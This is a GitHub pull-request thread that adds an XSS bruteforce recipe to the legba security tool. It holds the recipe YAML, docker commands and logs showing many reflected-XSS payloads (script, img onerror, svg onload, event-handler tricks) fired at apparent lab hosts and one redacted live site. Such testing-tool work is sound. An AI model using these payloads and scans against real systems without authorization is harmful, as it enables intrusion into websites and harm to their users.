### PR TITLE
XSS recipe

### PR DESCRIPTION
**Pull request by CyberRoute**
Hi! Looking for help here, I am trying to put together a recipe for XSS but I don't know how I can achieve something like so:
http-success-string: "$xss_payload" technically should check for each payload in the response.
Thanks in advance.

### CODE REVIEW

**Comment by evilsocket** [comment]
@CyberRoute pushed to main https://github.com/evilsocket/legba/commit/1164d0a1d3d77ad801cc7b19131cb07a2059f416

you should be able to use this in the recipe now:

```yaml
...
http-success-string: "{$payload}"
...
```

Alternatively, for plugins that use two credentials (username and password), it is possible to interpolate `{$username}` and `{$password}`... let me know how it goes! :D

**Comment by CyberRoute** [comment]
Thanks @evilsocket for such a quick response. Was trying this and I am scratching a little my head before the change was running something like so:
```
alessandro@xps:~/Development/cookbook/http/vulnerabilities/xss$ docker run -v $(pwd):/data legba -R data/recipe.yml "schema=http&host=94.237.59.199&port=56895&path=/index.php?task="
legba v0.9.0

[INFO ] recipe: data/recipe.yml (Performs common XSS bruteforce.)
[INFO ]   port=56895
[INFO ]   method=GET
[INFO ]   recipe.path=/data
[INFO ]   success_code=200
[INFO ]   schema=http
[INFO ]   host=94.237.59.199
[INFO ]   path=/index.php?task=
[INFO ] target: http://94.237.59.199:56895/index.php?task=
[INFO ] using -> wordlist /data/dictionary.txt
[INFO ] [2024-07-17 10:23:57] (http.enum) <http://94.237.59.199:56895/index.php?task=> page=http://94.237.59.199:56895/index.php?task=<script>alert(1)</script> status=200 size=1078 type=text/html
[INFO ] [2024-07-17 10:23:57] (http.enum) <http://94.237.59.199:56895/index.php?task=> page=http://94.237.59.199:56895/index.php?task=<script>alert(document.cookie)</script> status=200 size=1092 type=text/html
[INFO ] [2024-07-17 10:23:57] (http.enum) <http://94.237.59.199:56895/index.php?task=> page=http://94.237.59.199:56895/index.php?task=<script>alert(window.origin)</script> status=200 size=1090 type=text/html
[INFO ] [2024-07-17 10:23:57] (http.enum) <http://94.237.59.199:56895/index.php?task=> page=http://94.237.59.199:56895/index.php?task=<img src=x onerror=alert(1)> status=200 size=1081 type=text/html
[INFO ] [2024-07-17 10:23:57] (http.enum) <http://94.237.59.199:56895/index.php?task=> page=http://94.237.59.199:56895/index.php?task=<svg onload=alert(1)> status=200 size=1074 type=text/html
```
now I change the recipe to:
```
description: Performs common XSS bruteforce.
author: CyberRoute
plugin: http.enum
args:
    target: "{$schema or https}://{$host}:{$port or 443}{$path or /}"
    payloads: "{$recipe.path}/dictionary.txt"
    http-method: "{$method or GET}"
    http-success-codes: "{$success_code or 200}"
    http-success-string: "{$payload}"
```
reading through the docs and code I presume there should be an Option like you do with username and passwords? to pass to the recipe the dictionary of payloads to be checked in the responses? correct me if I am wrong! Thanks a mil
```
-U, --username <USERNAME>
          Constant, filename, glob expression as @/some/path/*.txt, permutations as #min-max:charset / #min-max or range as [min-max] / [n, n, n] [aliases: payloads]
  -P, --password <PASSWORD>
```

**Comment by evilsocket** [comment]
It's a bit confusing, let me explain:

Some plugins work with two credentials, like when you are bruteforcing samba or whatever, in which case you'll have to pass `--username` and `--password`. In this case you could use `{$username}` and `{$password}`.

Other plugins, like `http.enum`, `dns.enum` and so on only use a single payload (the xss string in your case, or the subdomain in the dns.enum case), in which case `--payloads` is really an alias for `--username`, if you check `legba -h`:

```
...
  -U, --username <USERNAME>
          Constant, filename, ... cut ... [aliases: payloads] <----
...
```

In this case you'll use `{$payload}` to indicate the entry from your txt file.

I hope it makes more sense now :D

**Comment by CyberRoute** [comment]
YESSS it's killing it XD 
```
alessandro@xps:~/Development/cookbook/http/vulnerabilities/xss$ docker run -v $(pwd):/data legba -R data/recipe.yml -U dictionary.txt "schema=http&host=94.237.51.8&port=53180&path=/index.php?task="
legba v0.9.0

[INFO ] recipe: data/recipe.yml (Performs common XSS bruteforce.)
[INFO ]   port=53180
[INFO ]   recipe.path=/data
[INFO ]   method=GET
[INFO ]   success_code=200
[INFO ]   path=/index.php?task=
[INFO ]   schema=http
[INFO ]   host=94.237.51.8
[INFO ] target: http://94.237.51.8:53180/index.php?task=
[INFO ] using -> wordlist /data/dictionary.txt
    
[INFO ] [2024-07-17 13:01:19] (http.enum) <http://94.237.51.8:53180/index.php?task=> page=http://94.237.51.8:53180/index.php?task=<script>alert(window.origin)</script> status=200 size=1090 type=text/html
[INFO ] [2024-07-17 13:01:19] (http.enum) <http://94.237.51.8:53180/index.php?task=> page=http://94.237.51.8:53180/index.php?task=<script>alert(1)</script> status=200 size=1078 type=text/html
[INFO ] [2024-07-17 13:01:19] (http.enum) <http://94.237.51.8:53180/index.php?task=> page=http://94.237.51.8:53180/index.php?task=<img src=x onerror=alert(1)> status=200 size=1081 type=text/html
[INFO ] [2024-07-17 13:01:19] (http.enum) <http://94.237.51.8:53180/index.php?task=> page=http://94.237.51.8:53180/index.php?task=<svg onload=alert(1)> status=200 size=1074 type=text/html
[INFO ] [2024-07-17 13:01:19] (http.enum) <http://94.237.51.8:53180/index.php?task=> page=http://94.237.51.8:53180/index.php?task=<script>alert(document.cookie)</script> status=200 size=1092 type=text/html
[INFO ] runtime 1.001321269s
```

**Comment by evilsocket** [comment]
@CyberRoute can you make sure that it's **not** matching when it's not supposed to? :P

**Comment by CyberRoute** [comment]
Sure! Was planning to add more XSS payloads as well

**Comment by CyberRoute** [comment]
> @CyberRoute can you make sure that it's **not** matching when it's not supposed to? :P

Wouldn't that be implicit? if the payload entry is not found in the http response legba would skip it? gave a few tries with `http-failure-string:` but so far haven't figured a decent approach

I did some tests and seems it is skipping when no XSS vuln is found:

```
alessandro@xps:~/Development/cookbook/http/vulnerabilities/xss$ docker run -v $(pwd):/data legba -R data/recipe.yml -U dictionary.txt "schema=https&host=REDACTED&path=/?s="
legba v0.9.0

[INFO ] recipe: data/recipe.yml (Performs common XSS bruteforce.)
[INFO ]   recipe.path=/data
[INFO ]   path=/?s=
[INFO ]   port=443
[INFO ]   host=REDACTED
[INFO ]   success_code=200
[INFO ]   method=GET
[INFO ]   schema=https
[INFO ] target: https://www.REDACETD:443/?s=
[INFO ] using -> wordlist /data/dictionary.txt
    
[INFO ] tasks=12 mem=36 MiB targets=1 attempts=24 done=21 (87.50%) speed=21 reqs/s
[INFO ] tasks=12 mem=36.9 MiB targets=1 attempts=24 done=23 (95.83%) speed=2 reqs/s
[INFO ] runtime 3.005734715s


alessandro@xps:~/Development/cookbook/http/vulnerabilities/xss$ docker run -v $(pwd):/data legba -R data/recipe.yml -U dictionary.txt "schema=http&host=94.237.59.199&port=48225&path=/index.php?task="
legba v0.9.0

[INFO ] recipe: data/recipe.yml (Performs common XSS bruteforce.)
[INFO ]   path=/index.php?task=
[INFO ]   recipe.path=/data
[INFO ]   method=GET
[INFO ]   success_code=200
[INFO ]   schema=http
[INFO ]   host=94.237.59.199
[INFO ]   port=48225
[INFO ] target: http://94.237.59.199:48225/index.php?task=
[INFO ] using -> wordlist /data/dictionary.txt
    
[INFO ] [2024-07-17 15:29:34] (http.enum) <http://94.237.59.199:48225/index.php?task=> page=http://94.237.59.199:48225/index.php?task=<x oncut=alert(1)>copy this! status=200 size=1081 type=text/html
[INFO ] [2024-07-17 15:29:34] (http.enum) <http://94.237.59.199:48225/index.php?task=> page=http://94.237.59.199:48225/index.php?task=<svg onload=alert(1)> status=200 size=1074 type=text/html
[INFO ] [2024-07-17 15:29:34] (http.enum) <http://94.237.59.199:48225/index.php?task=> page=http://94.237.59.199:48225/index.php?task=<script onbeforepaste="alert(1)" contenteditable>test</script> status=200 size=1115 type=text/html
[INFO ] [2024-07-17 15:29:34] (http.enum) <http://94.237.59.199:48225/index.php?task=> page=http://94.237.59.199:48225/index.php?task=<script>alert(1)</script> status=200 size=1078 type=text/html
[INFO ] [2024-07-17 15:29:34] (http.enum) <http://94.237.59.199:48225/index.php?task=> page=http://94.237.59.199:48225/index.php?task=<img src=x onerror=alert(1)> status=200 size=1081 type=text/html
[INFO ] [2024-07-17 15:29:34] (http.enum) <http://94.237.59.199:48225/index.php?task=> page=http://94.237.59.199:48225/index.php?task=</script><svg onload=alert(1)> status=200 size=1083 type=text/html
[INFO ] [2024-07-17 15:29:34] (http.enum) <http://94.237.59.199:48225/index.php?task=> page=http://94.237.59.199:48225/index.php?task=<x oncopy=alert(1)>copy this! status=200 size=1082 type=text/html
[INFO ] [2024-07-17 15:29:34] (http.enum) <http://94.237.59.199:48225/index.php?task=> page=http://94.237.59.199:48225/index.php?task=<x contenteditable onblur=alert(1)>lose focus! status=200 size=1099 type=text/html
[INFO ] [2024-07-17 15:29:34] (http.enum) <http://94.237.59.199:48225/index.php?task=> page=http://94.237.59.199:48225/index.php?task=<script>alert(window.origin)</script> status=200 size=1090 type=text/html
[INFO ] [2024-07-17 15:29:34] (http.enum) <http://94.237.59.199:48225/index.php?task=> page=http://94.237.59.199:48225/index.php?task=<x onclick=alert(1)>click this! status=200 size=1084 type=text/html
[INFO ] [2024-07-17 15:29:34] (http.enum) <http://94.237.59.199:48225/index.php?task=> page=http://94.237.59.199:48225/index.php?task=<x ondrag=alert(1)>drag this! status=200 size=1082 type=text/html
[INFO ] [2024-07-17 15:29:34] (http.enum) <http://94.237.59.199:48225/index.php?task=> page=http://94.237.59.199:48225/index.php?task=<x ondblclick=alert(1)>double click this! status=200 size=1094 type=text/html
[INFO ] [2024-07-17 15:29:34] (http.enum) <http://94.237.59.199:48225/index.php?task=> page=http://94.237.59.199:48225/index.php?task=<x contenteditable onfocus=alert(1)>focus this! status=200 size=1100 type=text/html
[INFO ] [2024-07-17 15:29:34] (http.enum) <http://94.237.59.199:48225/index.php?task=> page=http://94.237.59.199:48225/index.php?task=<x contenteditable onkeydown=alert(1)>press any key! status=200 size=1105 type=text/html
[INFO ] [2024-07-17 15:29:34] (http.enum) <http://94.237.59.199:48225/index.php?task=> page=http://94.237.59.199:48225/index.php?task=<x contenteditable oninput=alert(1)>input here! status=200 size=1100 type=text/html
[INFO ] [2024-07-17 15:29:34] (http.enum) <http://94.237.59.199:48225/index.php?task=> page=http://94.237.59.199:48225/index.php?task=<x contenteditable onkeyup=alert(1)>press any key! status=200 size=1103 type=text/html
[INFO ] [2024-07-17 15:29:34] (http.enum) <http://94.237.59.199:48225/index.php?task=> page=http://94.237.59.199:48225/index.php?task=<x contenteditable onkeypress=alert(1)>press any key! status=200 size=1106 type=text/html
[INFO ] [2024-07-17 15:29:34] (http.enum) <http://94.237.59.199:48225/index.php?task=> page=http://94.237.59.199:48225/index.php?task=<x onmousemove=alert(1)>hover this! status=200 size=1088 type=text/html
[INFO ] [2024-07-17 15:29:34] (http.enum) <http://94.237.59.199:48225/index.php?task=> page=http://94.237.59.199:48225/index.php?task=<x onmousedown=alert(1)>click this! status=200 size=1088 type=text/html
[INFO ] [2024-07-17 15:29:34] (http.enum) <http://94.237.59.199:48225/index.php?task=> page=http://94.237.59.199:48225/index.php?task=<x onmouseout=alert(1)>hover this! status=200 size=1087 type=text/html
[INFO ] [2024-07-17 15:29:34] (http.enum) <http://94.237.59.199:48225/index.php?task=> page=http://94.237.59.199:48225/index.php?task=<x onmouseover=alert(1)>hover this! status=200 size=1088 type=text/html
[INFO ] [2024-07-17 15:29:34] (http.enum) <http://94.237.59.199:48225/index.php?task=> page=http://94.237.59.199:48225/index.php?task=<x onmouseup=alert(1)>click this! status=200 size=1086 type=text/html
[INFO ] [2024-07-17 15:29:35] (http.enum) <http://94.237.59.199:48225/index.php?task=> page=http://94.237.59.199:48225/index.php?task=<x oncontextmenu=alert(1)>right click this! status=200 size=1096 type=text/html
[INFO ] tasks=12 mem=34.6 MiB targets=1 attempts=24 done=23 (95.83%) speed=23 reqs/s
[INFO ] [2024-07-17 15:29:36] (http.enum) <http://94.237.59.199:48225/index.php?task=> page=http://94.237.59.199:48225/index.php?task=<script>alert(document.cookie)</script> status=200 size=1092 type=text/html
[INFO ] runtime 2.003125458s

```

**Comment by evilsocket** [comment]
@CyberRoute yes it should and i also added unit tests for it, but you never know XD

**Comment by evilsocket** [comment]
@CyberRoute let me know when this is ready for merging

**Comment by CyberRoute** [comment]
Hey, thanks! I think could go in you tell me if there is anything else to add. Not sure is worth to add more XSS payloads (I didn't because git is plenty of nice dictionaries for that, so I wouldn't just copy&paste more stuff in here). Finally I still researching, hence I promise that this is only a begin :)

**Comment by CyberRoute** [comment]
Forgot to mention that I tested the changes you pushed for this and everything seems to work nicely

**Comment by evilsocket** [comment]
perfect! welcome to the repo :D

**Pull request merged**
